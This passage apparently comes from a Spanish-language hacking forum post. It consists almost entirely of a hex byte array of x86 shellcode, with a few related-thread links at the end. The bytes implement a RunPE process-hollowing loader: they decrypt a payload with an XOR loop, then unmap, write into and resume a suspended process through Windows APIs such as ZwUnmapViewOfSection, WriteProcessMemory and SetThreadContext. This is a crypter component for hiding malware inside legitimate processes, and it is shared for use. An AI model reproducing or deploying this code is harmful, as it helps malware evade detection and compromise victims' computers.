$C6,$45,$9E,$6C,$C6,$45,$9F,$65,$C6,$45,$A0,$48,$C6,$45,$A1,$61,$C6,$45,$A2,$6E,$C6,$45,$A3,$64,$C6,
$45,$A4,$6C,$C6,$45,$A5,$65,$C6,$45,$A6,$41,$C6,$45,$A7,$00,$C6,$45,$84,$47,$C6,$45,$85,$65,$C6,$45,
$86,$74,$C6,$45,$87,$4D,$C6,$45,$88,$6F,$C6,$45,$89,$64,$C6,$45,$8A,$75,$C6,$45,$8B,$6C,$C6,$45,$8C,
$65,$C6,$45,$8D,$46,$C6,$45,$8E,$69,$C6,$45,$8F,$6C,$C6,$45,$90,$65,$C6,$45,$91,$4E,$C6,$45,$92,$61,
$C6,$45,$93,$6D,$C6,$45,$94,$65,$C6,$45,$95,$41,$C6,$45,$96,$00,$C6,$85,$6F,$FF,$FF,$FF,$5A,$C6,$85,
$70,$FF,$FF,$FF,$77,$C6,$85,$71,$FF,$FF,$FF,$55,$C6,$85,$72,$FF,$FF,$FF,$6E,$C6,$85,$73,$FF,$FF,$FF,
$6D,$C6,$85,$74,$FF,$FF,$FF,$61,$C6,$85,$75,$FF,$FF,$FF,$70,$C6,$85,$76,$FF,$FF,$FF,$56,$C6,$85,$77,
$FF,$FF,$FF,$69,$C6,$85,$78,$FF,$FF,$FF,$65,$C6,$85,$79,$FF,$FF,$FF,$77,$C6,$85,$7A,$FF,$FF,$FF,$4F,
$C6,$85,$7B,$FF,$FF,$FF,$66,$C6,$85,$7C,$FF,$FF,$FF,$53,$C6,$85,$7D,$FF,$FF,$FF,$65,$C6,$85,$7E,$FF,
$FF,$FF,$63,$C6,$85,$7F,$FF,$FF,$FF,$74,$C6,$45,$80,$69,$C6,$45,$81,$6F,$C6,$45,$82,$6E,$C6,$45,$83,
$00,$C6,$85,$60,$FF,$FF,$FF,$56,$C6,$85,$61,$FF,$FF,$FF,$69,$C6,$85,$62,$FF,$FF,$FF,$72,$C6,$85,$63,
$FF,$FF,$FF,$74,$C6,$85,$64,$FF,$FF,$FF,$75,$C6,$85,$65,$FF,$FF,$FF,$61,$C6,$85,$66,$FF,$FF,$FF,$6C,
$C6,$85,$67,$FF,$FF,$FF,$41,$C6,$85,$68,$FF,$FF,$FF,$6C,$C6,$85,$69,$FF,$FF,$FF,$6C,$C6,$85,$6A,$FF,
$FF,$FF,$6F,$C6,$85,$6B,$FF,$FF,$FF,$63,$C6,$85,$6C,$FF,$FF,$FF,$45,$C6,$85,$6D,$FF,$FF,$FF,$78,$C6,
$85,$6E,$FF,$FF,$FF,$00,$C6,$85,$4F,$FF,$FF,$FF,$56,$C6,$85,$50,$FF,$FF,$FF,$69,$C6,$85,$51,$FF,$FF,
$FF,$72,$C6,$85,$52,$FF,$FF,$FF,$74,$C6,$85,$53,$FF,$FF,$FF,$75,$C6,$85,$54,$FF,$FF,$FF,$61,$C6,$85,
$55,$FF,$FF,$FF,$6C,$C6,$85,$56,$FF,$FF,$FF,$50,$C6,$85,$57,$FF,$FF,$FF,$72,$C6,$85,$58,$FF,$FF,$FF,
$6F,$C6,$85,$59,$FF,$FF,$FF,$74,$C6,$85,$5A,$FF,$FF,$FF,$65,$C6,$85,$5B,$FF,$FF,$FF,$63,$C6,$85,$5C,
$FF,$FF,$FF,$74,$C6,$85,$5D,$FF,$FF,$FF,$45,$C6,$85,$5E,$FF,$FF,$FF,$78,$C6,$85,$5F,$FF,$FF,$FF,$00,
$C6,$85,$3D,$FF,$FF,$FF,$52,$C6,$85,$3E,$FF,$FF,$FF,$65,$C6,$85,$3F,$FF,$FF,$FF,$61,$C6,$85,$40,$FF,
$FF,$FF,$64,$C6,$85,$41,$FF,$FF,$FF,$50,$C6,$85,$42,$FF,$FF,$FF,$72,$C6,$85,$43,$FF,$FF,$FF,$6F,$C6,
$85,$44,$FF,$FF,$FF,$63,$C6,$85,$45,$FF,$FF,$FF,$65,$C6,$85,$46,$FF,$FF,$FF,$73,$C6,$85,$47,$FF,$FF,
$FF,$73,$C6,$85,$48,$FF,$FF,$FF,$4D,$C6,$85,$49,$FF,$FF,$FF,$65,$C6,$85,$4A,$FF,$FF,$FF,$6D,$C6,$85,
$4B,$FF,$FF,$FF,$6F,$C6,$85,$4C,$FF,$FF,$FF,$72,$C6,$85,$4D,$FF,$FF,$FF,$79,$C6,$85,$4E,$FF,$FF,$FF,
$00,$C6,$85,$2A,$FF,$FF,$FF,$57,$C6,$85,$2B,$FF,$FF,$FF,$72,$C6,$85,$2C,$FF,$FF,$FF,$69,$C6,$85,$2D,
$FF,$FF,$FF,$74,$C6,$85,$2E,$FF,$FF,$FF,$65,$C6,$85,$2F,$FF,$FF,$FF,$50,$C6,$85,$30,$FF,$FF,$FF,$72,
$C6,$85,$31,$FF,$FF,$FF,$6F,$C6,$85,$32,$FF,$FF,$FF,$63,$C6,$85,$33,$FF,$FF,$FF,$65,$C6,$85,$34,$FF,
$FF,$FF,$73,$C6,$85,$35,$FF,$FF,$FF,$73,$C6,$85,$36,$FF,$FF,$FF,$4D,$C6,$85,$37,$FF,$FF,$FF,$65,$C6,
$85,$38,$FF,$FF,$FF,$6D,$C6,$85,$39,$FF,$FF,$FF,$6F,$C6,$85,$3A,$FF,$FF,$FF,$72,$C6,$85,$3B,$FF,$FF,
$FF,$79,$C6,$85,$3C,$FF,$FF,$FF,$00,$C6,$85,$19,$FF,$FF,$FF,$47,$C6,$85,$1A,$FF,$FF,$FF,$65,$C6,$85,
$1B,$FF,$FF,$FF,$74,$C6,$85,$1C,$FF,$FF,$FF,$54,$C6,$85,$1D,$FF,$FF,$FF,$68,$C6,$85,$1E,$FF,$FF,$FF,
$72,$C6,$85,$1F,$FF,$FF,$FF,$65,$C6,$85,$20,$FF,$FF,$FF,$61,$C6,$85,$21,$FF,$FF,$FF,$64,$C6,$85,$22,
$FF,$FF,$FF,$43,$C6,$85,$23,$FF,$FF,$FF,$6F,$C6,$85,$24,$FF,$FF,$FF,$6E,$C6,$85,$25,$FF,$FF,$FF,$74,
$C6,$85,$26,$FF,$FF,$FF,$65,$C6,$85,$27,$FF,$FF,$FF,$78,$C6,$85,$28,$FF,$FF,$FF,$74,$C6,$85,$29,$FF,
$FF,$FF,$00,$C6,$85,$08,$FF,$FF,$FF,$53,$C6,$85,$09,$FF,$FF,$FF,$65,$C6,$85,$0A,$FF,$FF,$FF,$74,$C6,
$85,$0B,$FF,$FF,$FF,$54,$C6,$85,$0C,$FF,$FF,$FF,$68,$C6,$85,$0D,$FF,$FF,$FF,$72,$C6,$85,$0E,$FF,$FF,
$FF,$65,$C6,$85,$0F,$FF,$FF,$FF,$61,$C6,$85,$10,$FF,$FF,$FF,$64,$C6,$85,$11,$FF,$FF,$FF,$43,$C6,$85,
$12,$FF,$FF,$FF,$6F,$C6,$85,$13,$FF,$FF,$FF,$6E,$C6,$85,$14,$FF,$FF,$FF,$74,$C6,$85,$15,$FF,$FF,$FF,
$65,$C6,$85,$16,$FF,$FF,$FF,$78,$C6,$85,$17,$FF,$FF,$FF,$74,$C6,$85,$18,$FF,$FF,$FF,$00,$C6,$85,$FB,
$FE,$FF,$FF,$52,$C6,$85,$FC,$FE,$FF,$FF,$65,$C6,$85,$FD,$FE,$FF,$FF,$73,$C6,$85,$FE,$FE,$FF,$FF,$75,
$C6,$85,$FF,$FE,$FF,$FF,$6D,$C6,$85,$00,$FF,$FF,$FF,$65,$C6,$85,$01,$FF,$FF,$FF,$54,$C6,$85,$02,$FF,
$FF,$FF,$68,$C6,$85,$03,$FF,$FF,$FF,$72,$C6,$85,$04,$FF,$FF,$FF,$65,$C6,$85,$05,$FF,$FF,$FF,$61,$C6,
$85,$06,$FF,$FF,$FF,$64,$C6,$85,$07,$FF,$FF,$FF,$00,$C6,$45,$E2,$6E,$C6,$45,$E3,$74,$C6,$45,$E4,$64,
$C6,$45,$E5,$6C,$C6,$45,$E6,$6C,$C6,$45,$E7,$00,$C6,$85,$EC,$FE,$FF,$FF,$43,$C6,$85,$ED,$FE,$FF,$FF,
$72,$C6,$85,$EE,$FE,$FF,$FF,$65,$C6,$85,$EF,$FE,$FF,$FF,$61,$C6,$85,$F0,$FE,$FF,$FF,$74,$C6,$85,$F1,
$FE,$FF,$FF,$65,$C6,$85,$F2,$FE,$FF,$FF,$50,$C6,$85,$F3,$FE,$FF,$FF,$72,$C6,$85,$F4,$FE,$FF,$FF,$6F,
$C6,$85,$F5,$FE,$FF,$FF,$63,$C6,$85,$F6,$FE,$FF,$FF,$65,$C6,$85,$F7,$FE,$FF,$FF,$73,$C6,$85,$F8,$FE,
$FF,$FF,$73,$C6,$85,$F9,$FE,$FF,$FF,$41,$C6,$85,$FA,$FE,$FF,$FF,$00,$C6,$85,$DF,$FE,$FF,$FF,$4C,$C6,
$85,$E0,$FE,$FF,$FF,$6F,$C6,$85,$E1,$FE,$FF,$FF,$61,$C6,$85,$E2,$FE,$FF,$FF,$64,$C6,$85,$E3,$FE,$FF,
$FF,$4C,$C6,$85,$E4,$FE,$FF,$FF,$69,$C6,$85,$E5,$FE,$FF,$FF,$62,$C6,$85,$E6,$FE,$FF,$FF,$72,$C6,$85,
$E7,$FE,$FF,$FF,$61,$C6,$85,$E8,$FE,$FF,$FF,$72,$C6,$85,$E9,$FE,$FF,$FF,$79,$C6,$85,$EA,$FE,$FF,$FF,
$41,$C6,$85,$EB,$FE,$FF,$FF,$00,$8D,$85,$DF,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$E8,
$8B,$75,$0C,$4E,$85,$F6,$7C,$17,$46,$33,$DB,$8B,$45,$08,$8A,$04,$03,$34,$2A,$34,$87,$8B,$55,$08,$88,
$04,$13,$43,$4E,$75,$EC,$8B,$45,$08,$89,$45,$AC,$8D,$45,$97,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,
$8D,$45,$84,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$F0,$6A,$69,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,
$D3,$50,$FF,$D6,$8D,$85,$7C,$FE,$FF,$FF,$BB,$43,$00,$00,$00,$C6,$04,$03,$00,$4B,$83,$FB,$FF,$75,$F6,
$C7,$85,$7C,$FE,$FF,$FF,$44,$00,$00,$00,$8D,$85,$EC,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,
$D8,$8D,$85,$C0,$FE,$FF,$FF,$50,$8D,$85,$7C,$FE,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,$6A,$00,$6A,$00,
$6A,$00,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,$D3,$8D,$85,$19,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,
$55,$EC,$8B,$D8,$C7,$85,$B0,$FD,$FF,$FF,$07,$00,$01,$00,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,
$FF,$FF,$50,$FF,$D3,$8D,$85,$3D,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8D,$45,$D0,$50,
$6A,$04,$8D,$45,$C8,$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,
$8D,$85,$6F,$FF,$FF,$FF,$50,$8D,$45,$E2,$50,$FF,$55,$E8,$50,$FF,$55,$EC,$8B,$D8,$8B,$45,$C8,$50,$8B,
$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$8B,$45,$AC,$8B,$40,$3C,$03,$45,$AC,$89,$45,$D4,$8D,$85,$60,$FF,$FF,
$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$6A,$40,$68,$00,$30,$00,$00,$8B,$45,$D4,$8B,$40,$50,$50,
$8B,$45,$D4,$8B,$40,$34,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$89,$45,$C8,$8D,$85,$2A,$FF,$FF,$FF,
$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F4,$8D,$45,$CC,$50,$8B,$45,$D4,$8B,$40,$54,$50,$8B,$45,$AC,
$50,$8B,$45,$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8D,$78,$18,$8B,$45,$D4,$0F,
$B7,$40,$14,$03,$F8,$8D,$85,$4F,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F8,$C7,$85,$90,
$FD,$FF,$FF,$01,$00,$00,$00,$C7,$85,$94,$FD,$FF,$FF,$10,$00,$00,$00,$C7,$85,$98,$FD,$FF,$FF,$02,$00,
$00,$00,$C7,$85,$9C,$FD,$FF,$FF,$20,$00,$00,$00,$C7,$85,$A0,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$A4,
$FD,$FF,$FF,$40,$00,$00,$00,$C7,$85,$A8,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$AC,$FD,$FF,$FF,$40,$00,
$00,$00,$8B,$45,$D4,$0F,$B7,$70,$06,$4E,$85,$F6,$7C,$66,$46,$33,$DB,$8D,$45,$CC,$50,$8D,$04,$9B,$8B,
$44,$C7,$10,$50,$8D,$04,$9B,$8B,$44,$C7,$14,$03,$45,$AC,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,$C8,
$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8D,$45,$C4,$50,$8D,$04,$9B,$8B,$44,$C7,$24,$C1,$E8,$1D,
$8B,$84,$85,$90,$FD,$FF,$FF,$50,$8D,$04,$9B,$8B,$44,$C7,$08,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,
$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F8,$43,$4E,$75,$9D,$8D,$45,$CC,$50,$6A,$04,$8D,$45,$C8,
$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8B,
$40,$28,$03,$45,$C8,$89,$85,$60,$FE,$FF,$FF,$8D,$85,$08,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,
$8B,$D8,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$8D,$85,$FB,$FE,$FF,$FF,$50,
$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$5F,$5E,$5B,$8B,$E5,$5D,$C2,
$08,$00                 
);

 

¿Te gustó el post? COMPARTILO!



[MASM] Shellcode RunPE

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2929
Último mensaje Junio 05, 2012, 04:44:43 pm
por ANTRAX
RunPE FASM

Iniciado por Juan

Respuestas: 4
Vistas: 3916
Último mensaje Julio 16, 2013, 07:26:11 pm
por Karcrack
[Guía NASM] Introducción a Netwide Assembler (Partes 1 y 2) (Descarga PDF)

Iniciado por yoyomismo

Respuestas: 5
Vistas: 6979
Último mensaje Abril 10, 2013, 12:07:21 pm
por yoyomismo
Socket con nasm... al fin lo logre

Iniciado por proxy_lainux

Respuestas: 2
Vistas: 2492
Último mensaje Julio 20, 2013, 07:43:30 pm
por Expermicid
[NASM] Reverse string

Iniciado por Sanko

Respuestas: 2
Vistas: 2449
Último mensaje Febrero 22, 2014, 07:52:03 am
por Sanko